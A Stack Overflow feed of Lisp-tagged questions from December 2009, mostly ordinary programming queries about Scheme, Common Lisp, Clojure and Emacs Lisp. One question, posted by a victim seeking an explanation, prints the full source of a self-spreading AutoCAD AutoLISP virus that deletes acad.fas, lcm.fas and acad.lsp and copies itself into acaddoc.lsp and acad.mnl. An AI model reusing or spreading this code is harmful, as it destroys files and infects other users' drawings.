active questions tagged lisp - Stack Overflowmost recent 30 from stackoverflow.com2009-12-20T17:04:50Zhttp://stackoverflow.com/feeds/tag/lisphttp://www.creativecommons.org/licenses/by-nc/2.5/rdfhttp://stackoverflow.com/questions/1919702/assigning-the-result-of-an-expression-to-a-variable0Assigning the result of an expression to a variableSteve2009-12-17T05:45:05Z2009-12-20T04:19:41Z
<p>Working with DrScheme (language-- Pretty Big). Trying to pass the result of an expression to a variable that can later be used in another expression. Here is a simplified version of the problem:</p>
<p>Definitions window:</p>
<pre><code>(define (tot a b c) (+ a b c))
(define (tot2) (+ (tot a b c) 1))
</code></pre>
<p>Interpreter window</p>
<pre><code>> (tot 5 6 7)
18
> (tot2)
. . reference to undefined identifier: a
</code></pre>
<p>The result I want, of course, is 19. It would be easy to have DrScheme do all the algebra at once, but I need to have it solve the first expression, then solve the second expression based on the result of the first.</p>
http://stackoverflow.com/questions/1934551/what-is-the-difference-between-require-and-load-in-common-lisp2What is the difference between require and load in common lisp?nicholas2009-12-20T00:19:18Z2009-12-20T00:29:19Z
<p>I'm going through Practical Common Lisp, I'm almost finished, and one question that has not been answered for me so far (or maybe I just missed it) is the difference between "require" and "load".</p>
<p>So what is the difference?</p>
<p>Thanks.</p>
http://stackoverflow.com/questions/1934490/hunchentoot-1-0-returns-only-empty-responses0Hunchentoot 1.0 returns only empty responsesKen2009-12-19T23:44:20Z2009-12-19T23:44:20Z
<p>I'm using an Intel Mac with Mac OS 10.5 and SBCL 1.0.29. I've done pre-1.0 Hunchentoot development here before, so I've had that installed (via asdf-install).</p>
<p>Recently I started a new project, and decided I'd start from Hunchentoot 1.0. I asdf-install'ed Hunchentoot, and it seemed to install 1.0 (and deps) just fine. I can load it in SBCL (via SLIME or Terminal), and I can write code against the new interface, and it compiles great, and everything seems fine.</p>
<p>That is, until I try to access the webpage: I only get empty responses. Firebug reports "200 OK" but Page Info shows size "0 bytes" (text/plain, ISO-8859-1, but I'm guessing those are defaults). So I tried netcat and telnet, and it seems to accept a connection on my port and then immediately disconnect.</p>
<p>Is there a problem with Hunchentoot 1.0 on Mac OS? Or with having 2 Hunchentoot versions asdf-install'ed at the same time? Or something else I'm not thinking of? I'm sure it's probably something obvious but I'm drawing a blank here.</p>
<p>Thanks!</p>
http://stackoverflow.com/questions/1909496/more-explanation-on-lexical-binding-in-closures3More explanation on Lexical Binding in Closures?ajay2009-12-15T18:43:55Z2009-12-19T04:25:21Z
<p><strong>There are many SO posts related to this, but I am asking this again with a different purpose</strong></p>
<p>I am trying to understand why closures are important and useful. One of things that I've read in other SO posts related to this is that when you pass a variable to closure, the closure starts remembering this value from then onwards. Is this the entire Technical aspect of it or there is more to what happens there.</p>
<p>What I wonder then is what would happen when the variable used inside the closure gets modified from outside. Should they be constants only?</p>
<p>In the language Clojure, I can do the following: But since there are value is immutable, this issue does not arise. What about other languages and what is the proper technical definition of a closure?</p>
<pre><code>(defn make-greeter [greeting-prefix]
(fn [username] (str greeting-prefix ", " username)))
((make-greeter "Hello") "World")
</code></pre>
http://stackoverflow.com/questions/1930901/exclusive-or-in-scheme0Exclusive OR in SchemeJeffrey Aylesworth2009-12-18T21:56:32Z2009-12-19T01:01:13Z
<p>What is the exclusive or functions in scheme? I've tried <code>xor</code> and <code>^</code>, but both give me an unbound local variable error.</p>
<p>Googling found nothing.</p>
http://stackoverflow.com/questions/1926835/how-to-write-an-interpreter5How to write an interpreter?bennybdbc2009-12-18T07:25:23Z2009-12-18T16:32:43Z
<p>I have decided to write a small interpreter as my next project, in Ruby. What knowledge/skills will I need to have to be successful?<br>
I haven't decided on the language to interpret yet, but I am looking for something that is not a toy language, but would be relatively easy to write an interpreter for.
Thanks in advance. </p>
http://stackoverflow.com/questions/1868807/elisp-function-returning-mark-instead-of-the-right-value3Elisp function returning mark instead of the right valuePaul Nathan2009-12-08T18:10:19Z2009-12-18T13:56:41Z
<p>I'm writing a routine to test to see if point is at the practical end of line. </p>
<pre><code>(defun end-of-line-p ()
"T if there is only \w* between point and end of line"
(interactive)
(save-excursion
(set-mark-command nil) ;mark where we are
(move-end-of-line nil) ;move to the end of the line
(let ((str (buffer-substring (mark) (point)))) ;; does any non-ws text exist in the region? return false
(if (string-match-p "\W*" str)
t
nil))))
</code></pre>
<p>The problem is, when running it, I see "mark set" in the minibuffer window, instead of T or nil.</p>
http://stackoverflow.com/questions/1871323/using-ido-el-to-find-files-in-a-git-repository4Using ido.el to find files in a git repositorymwilliams2009-12-09T02:53:43Z2009-12-18T01:24:21Z
<p>I'm currently using <a href="http://github.com/defunkt/textmate.el/blob/master/textmate.el" rel="nofollow">textmate.el</a> from <a href="http://www.twitter.com/defunkt" rel="nofollow">@defunkt</a> to emulate functionality of Textmate in Emacs.</p>
<p>Its equivalent of command-t to find a file in a project uses a git repository as your project (as Emacs doesn't so much have the concept of a project like Textmate does, though you could use a tags file or something along those lines).</p>
<p>Textmate.el uses ido for much of its functionality but it's missing out on features in ido that I could typically benefit from when I do a simple C-x C-f, such as C-k for deleting the head file.</p>
<p>As a <em>very</em> new person to Lisp, what would be my best approach, if it's not done already, to build a defun along the lines of ido-find-file-in-git-repo?</p>
<p>Ultimately I would like to utilize features like C-k when in textmate-find-file to delete a file.</p>
<p>Any thoughts on the best approach? Build a new ido function from scratch or refactor textmate.el?</p>
<p>Working with ido.el seems pretty trivial, I think I just need a good starting point for building upon it.</p>
<p>Thanks!</p>
<p><strong>EDIT</strong></p>
<p>Ultimately what it comes down to is being able to have the following key binding available to me in the minibuffer</p>
<pre><code>(define-key map "\C-k" 'ido-delete-file-at-head)
</code></pre>
<p>when the following is executed and searching for files (I added some inline comments):</p>
<pre><code>(defun textmate-goto-file ()
"Uses your completing read to quickly jump to a file in a project."
(interactive)
(let ((root (textmate-project-root)))
(when (null root)
(error
(concat
"Can't find a suitable project root ("
(string-join " " *textmate-project-roots* )
")")))
(find-file ;; Would this need to be changed to ido-file-file?
(concat
(expand-file-name root) "/"
(textmate-completing-read ;; Would this need to be changed to ido-completing-read?
"Find file: "
(textmate-cached-project-files root))))))
</code></pre>
http://stackoverflow.com/questions/1919097/functional-programming-what-is-an-improper-list5Functional Programming: what is an "improper list" ?jldupont2009-12-17T02:18:02Z2009-12-17T18:26:39Z
<p>Could somebody explain what an "improper list" is?</p>
<p><strong>Note</strong>: Thanks to all ! All you guys rock!</p>
http://stackoverflow.com/questions/59428/learning-lisp-scheme-interpreter5Learning LISP/Scheme - InterpreterDavid in Dakota2008-09-12T16:23:12Z2009-12-17T05:18:45Z
<p>Hey everyone, </p>
<p>I've been making my way through The Little Schemer and was wondering what environment/ide/interpreter would be best to use in order to test any of the Scheme code I jot down for myself.</p>
<p>Thanks</p>
http://stackoverflow.com/questions/1719551/getting-the-first-n-elements-of-a-list-in-common-lisp5Getting the first n elements of a list in Common Lisp?esperantist2009-11-12T02:39:33Z2009-12-16T19:30:45Z
<p>The title says it all, really. How would I get the first <code>n</code> elements of a list?</p>
<pre><code>CL-USER> (equal (some-function 2 '(1 20 300))
'(1 20))
T
</code></pre>
<p>I am absolutely certain this is elementary, but help a brother newb out.</p>
<p>Kisses and hugs.</p>
http://stackoverflow.com/questions/233171/what-is-the-best-way-to-do-gui-in-clojure13What is the best way to do Gui in Clojure?Dev er dev2008-10-24T11:31:58Z2009-12-16T14:16:13Z
<p>What is the best way to do Gui in Clojure?</p>
<p>Is there an example of some functional swing or SWT wrapper?
Or some integration with javafx declarative gui description which could be easily wrapped to s-expressions using some macrology?</p>
<p>Any tutorials?</p>
http://stackoverflow.com/questions/1910003/lisp-style-style-let-syntax-in-python-list-comprehensions1lisp-style style `let` syntax in Python list-comprehensionsSridhar Ratnakumar2009-12-15T20:02:47Z2009-12-16T01:41:24Z
<p>Consider the following code:</p>
<pre><code>>>> colprint([
(name, versions[name][0].summary or '')
for name in sorted(versions.keys())
])
</code></pre>
<p>What this code does is to print the elements of the dictionary <code>versions</code> in ascending order of its <code>keys</code>, but since the <code>value</code> is another sorted list, only the summary of its <em>first</em> element (the 'max') is printed.</p>
<p>Since I am familiar with <code>let</code> from lisp, I rewrote the above as:</p>
<pre><code>>>> colprint([
(name, package.summary or '')
for name in sorted(versions.keys())
for package in [versions[name][0]]
)]
</code></pre>
<p>Do you think this violates <a href="http://www.python.org/dev/peps/pep-0020/" rel="nofollow">being Pythonic</a>? Can it be improved?</p>
<p>Note: For the curious, <code>colprint</code> is defined <a href="http://stackoverflow.com/questions/1396820/apt-like-column-output-python-library/1397382#1397382">here</a>.</p>
http://stackoverflow.com/questions/1905635/elephant-database1Elephant databaseArjun2009-12-15T06:55:17Z2009-12-15T06:58:48Z
<p>hi,
I am a new user to elephant can you please advice me how to start my work , actually a little source code will be helpfull.</p>
http://stackoverflow.com/questions/1904768/mystified-by-end-of-file-condition-in-common-lisp0Mystified by end-of-file condition in common lisp1.6182009-12-15T01:51:44Z2009-12-15T06:38:37Z
<p>cann't read text file.</p>
<p>READ: input stream #1=# has reached its end
[Condition of type SYSTEM::SIMPLE-END-OF-FILE]</p>
<p>what means is "has reached its end."</p>
http://stackoverflow.com/questions/1903181/debugging-what-this-lisp-virus-is-doing7Debugging what this LISP Virus is doingunknown (google)2009-12-14T20:11:06Z2009-12-14T20:56:48Z
<p>My firm has been hit by an AutoCAD virus that is deleting and replacing our <code>acaddoc.lsp</code> with the routine below. </p>
<p>I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes". </p>
<h3>Questions</h3>
<ol>
<li>What is this replacing the files with (currently searching for <code>acadapq</code>) ? </li>
<li>Who writes a virus for AutoCAD?!?! </li>
</ol>
<p>Has anyone seen this before? the CAD forums aren't very helpful.</p>
<pre><code>(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.fas")
(if (vl-file-delete (findfile "acad.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "lcm.fas")
(if (vl-file-delete (findfile "lcm.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.lsp")
(if (vl-file-delete (findfile "acad.lsp"))
(setq n 0))
(setq n 2)))
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1))
(close wwjm)
(close wwjm1))))
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq ab (atoi (substr wz 4 1)))
(close wwjm)
(if (> ab bb)
(setq lbz 1))))
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq nb (atoi (substr wz 4 1)))
(close wwjm)
(if (< nb bb)
(setq lbz 1)))
(setq lbz 1))
(if (= lbz 1)
(progn
(setq woldacad (strcat dpath "acaddoc.lsp"))
(setq wnewacad (strcat wpath "acad.mnl"))
(wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
(/= (substr dpath 1 1) (chr 68))
(/= (substr dpath 1 1) (chr 69))
(/= (substr dpath 1 1) (chr 70)))
(progn
(setq woldacad (strcat wpath "acad.mnl"))
(setq wnewacad (strcat dpath "acaddoc.lsp"))
(wwriteapp))
(vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
</code></pre>
http://stackoverflow.com/questions/1885019/how-do-i-write-all-but-one-function-in-scheme-lisp1How do I write all-but-one function in Scheme/LISP?kunjaan2009-12-11T00:12:57Z2009-12-14T18:53:57Z
<p>Can you guys think of the shortest and the most idiomatic solution to all-but-one function?</p>
<pre><code>;; all-but-one
;; checks if all but one element in a list holds a certain property
;; (all-but-one even? (list 1 2 4)) -> true
;; (all-but-one even? '(1)) -> true
;; (all-but-one even? '(2 4)) -> false
</code></pre>
<p>Edit: all but EXACTLY one.</p>
http://stackoverflow.com/questions/1778464/common-lisp-attach-x-recursively-to-list2Common Lisp: Attach x recursively to listqwerty2009-11-22T11:28:45Z2009-12-14T13:53:29Z
<p>I'm trying to add, say, x to every element of a list.
For example:</p>
<pre><code>(queue 3 '(1 2 3))
</code></pre>
<p>would give</p>
<pre><code>((3 1) (3 2) (3 3))
</code></pre>
<p>The code below apparently does not do what I want.
Any hints please?</p>
<pre><code>(defun queue(x y)
(cond
((null y) nil)
(t (cons x (queue x (rest y))))))
</code></pre>
http://stackoverflow.com/questions/1900840/how-can-i-write-a-function-in-clisp-and-call-it-in-c1How can I write a function in CLisp and call it in C?1.6182009-12-14T13:10:02Z2009-12-14T13:36:33Z
<p>Thanks for answering.</p>
http://stackoverflow.com/questions/1257021/suitable-functional-language-for-scientific-statistical-computing21Suitable functional language for scientific/statistical computing?gappy2009-08-10T20:27:14Z2009-12-12T12:07:35Z
<p>I use mostly <a href="http://en.wikipedia.org/wiki/R%5F%28programming%5Flanguage%29" rel="nofollow">R</a> and C for statistics-related tasks. Recently
I have been dealing with large datasets, typically 1e7-1e8
observations, and 100 features. They seem too big for R too
handle, and the package I typically use are also more prone
to crashing. I could develop tools directly in C or C++, but
this would slow down the development cycle. I am searching
on the web for alternatives to R for large-scale analysis,
or for R extensions in this direction. I would like to poll
the Stack Overflow community for <em>specific</em> suggestions on
what to use. Ideally, a good candidate should have stable
and multiplatform implementations, a robust user community
(or at least a committed and growing small user base), and
of course be faster than R (by passing references to functions,
compiling, facilitate parallelization of embarassingly
parallel jobs).</p>
<p>I have been looking at functional languages. <strong><a href="http://en.wikipedia.org/wiki/Lush%5F%28programming%5Flanguage%29" rel="nofollow">Lush</a></strong> (by
Bottou and LeCoun) and <strong>Clojure/Incanter</strong> are specifically
geared for numerical computation, but seem to have very few
users. <strong>Haskell</strong>, <strong>Common Lisp</strong>, <strong>Scheme</strong> have a solid user
base, but I am not sure that people use them for numerical
work.</p>
<p>Apologies if this question seems too generic. I am not
asking for philosophical statements regarding the merit of
this or that language. I Just would like to know what you
use for custom analysis of very large data sets.</p>
http://stackoverflow.com/questions/1877318/another-lisp-function-refinement1Another Lisp function refinementRobert2009-12-09T22:17:13Z2009-12-10T08:56:41Z
<p>I've completed the Graham's exercise Chapter 5.8,and my code is:</p>
<pre><code>(defun max-min (vec &key (start 0) (end (length vec)))
(cond
((eql start (1- end)) (values (elt vec start) (elt vec (1- end))))
((zerop end) (values nil nil))
(t
(multiple-value-bind (x y) (max-min vec :start (1+ start) :end end)
(let* ((maxx x)(minn y))
(values (max maxx (elt vec start)) (min minn (elt vec start))))))))
</code></pre>
<p>You don't need to worry about the details, basically it just returns the max and min of a given vector in a "value" form.<br>
I use the above recursion to solve the problem, but my teachers marked my function as "almost done" with such critique:</p>
<p>"If a function takes start and end, then length is neither needed nor correct. Length could be > 0 but it's whether start < end or not that matters. Testing end all by itself is not relevant at all."</p>
<p>I am not very clear at this point, I tried getting rid of the (length vec) default value for "end", but then the default value for end becomes nil.<br>
We have clear instrution that "length" should at most be called once.<br>
Could you please give me some hint on this? Thanks.</p>
http://stackoverflow.com/questions/1868569/compiling-to-idiomatic-c2Compiling to idiomatic CSteve2009-12-08T17:34:30Z2009-12-10T01:48:17Z
<p>Are there any compilers out there for function or lisp-ish languages that compile to idiomatic C? Most compilers out there seem to provide something resembling a machine language composed of C macros. I'm wondering if there is anything out there that can produce readable C code based on a higher-level language.</p>
http://stackoverflow.com/questions/106221/why-isnt-lisp-more-widely-used34Why isn't LISP more widely used?Chris2008-09-19T22:45:47Z2009-12-09T13:17:01Z
<p>I've heard a lot of people espouse the capabilities of LISP and its omnipotent macros. If LISP is such a great language, why isn't it being adopted more? What problems is LISP facing that is holding it back from (re)emerging as popular language? Is it something about LISP itself ("those brackets!" isn't the answer, is it?!), or its competitors (e.g. the dominance of Java, .NET)?</p>
http://stackoverflow.com/questions/1857083/how-functional-language-are-different-from-the-language-implementation-point-of-v7How Functional language are different from the language implementation point of view.Dinesh Simkhada2009-12-06T23:59:49Z2009-12-09T01:33:00Z
<p>There is the whole new paradigm of "functional programming", which needs a total change of thought patterns compared to procedural programming. It uses higher order functions, purity, monads, etc., which we don't usually see in imperative and object oriented languages.</p>
<p>My question is how the <em>implementation</em> of these languages differs from imperative or object oriented languages, with respect to, for example, memory management or internals like pointers etc..</p>
<p>There are functional languages that run on top of the JVM. Does this mean that these languages internally work like the other languages on the JVM?</p>
http://stackoverflow.com/questions/1869763/how-can-lisp-make-me-a-better-c-developer10How can Lisp make me a better C# developer?Erik2009-12-08T20:54:47Z2009-12-08T23:49:34Z
<p>I'm considering learning a Lisp dialect (probably Scheme, since I am constantly hearing how good of a learning language it is) in order to improve my general programming skill.</p>
<p>Apart from the fact that learning any new language helps you to be a better programmer in general, how can learning Lisp make me a better C# programmer?</p>
http://stackoverflow.com/questions/1867623/homework-lisp-items-that-appear-more-than-once-in-a-list2Homework: Lisp items that appear more than once in a listdaniels2009-12-08T15:15:34Z2009-12-08T19:11:11Z
<p>Given a list, I'm trying to return a new one that has only the items that appear more than once in the first list I receive as a parameter.</p>
<p>I have done the following:</p>
<pre><code>(defun myf (lista)
(if (endp lista)
nil
(if (member (first lista) (rest lista))
(append (list (first lista)) (myf (rest lista)))
(myf (rest lista)))))
</code></pre>
<p>If I run the following: <code>(myf '(A A B A B C))</code>, it returns <code>(A A B)</code>.
How can I make it return items only once (i.e., not have double "A")?</p>
http://stackoverflow.com/questions/1865820/sbcl-standard-library-documentation2SBCL standard library documentation?culebrón2009-12-08T09:36:54Z2009-12-08T14:01:13Z
<p>I want to learn and use <a href="http://www.sbcl.org/" rel="nofollow">SBCL</a> because of its ease of learning and speed. (I've been playing with Lisp 3 years ago, and now am refreshing it.) But how can I learn what's included in the standard library, so that I don't re-implement things?</p>
<p>After Python this is like a nightmare: the SBCL website has a <a href="http://www.sbcl.org/manual/" rel="nofollow">manual</a> that covers the <strong>software</strong> only, not a word on the standard library. <em>(For comparison, Gnu Common Lisp's website has only sources and binaries.)</em></p>
http://stackoverflow.com/questions/1864795/what-does-my-other-car-is-a-cdr-mean3What does "my other car is a cdr" mean?CaptainCasey2009-12-08T05:26:16Z2009-12-08T06:05:40Z
<p>Can anyone well versed in lisp explain this joke to me?
I've done some reading on functional programming languages and know that CAR/CDR mean Contents of Address/Decrement Register but I still don't really understand the humour. </p>
http://stackoverflow.com/questions/1864048/what-is-the-smallest-lisp-ish-interpreter-compiler5What is the smallest lisp-ish interpreter? Compiler?Steve2009-12-08T01:37:00Z2009-12-08T03:45:20Z
<p>I'm looking at ways to embed a lisp or scheme in a C program, but I want to do so without growing the program size considerably. It doesn't need to be fast, or support lots of features. (Though macros would be nice.) This is not a math-intensive application.</p>
<p>Please list the smallest embeddable interpreter for a lisp-like language you know of. Alternatively, list compilers which generate very small embeddable and self-contained code.</p>
http://stackoverflow.com/questions/1860696/returning-an-element-from-a-list1Returning an element from a listdaniels2009-12-07T15:28:07Z2009-12-07T20:51:12Z
<p>I'm trying to learn lisp and as i'm making my first steps i got stuck.
How can i get c element form following list: <code>(a b (c.d))</code></p>
<p>I've tried: <code>(caar (last '(a b (c.d))))</code> but it returns c.d and not only c<br>
This however works if there are spaces between c, . , d ie: <code>(caar (last '(a b (c . d))))</code> </p>
<p>The problem i'm trying to resolves has the list specified without spaces. Can that be done or it's a typo in the exercise?</p>
<p>Thanks.</p>
<p><strong>LE</strong>: Uisng GNU Clisp <a href="http://clisp.cons.org/" rel="nofollow">http://clisp.cons.org/</a>
Is it possible that the issue it's caused by the implementation? </p>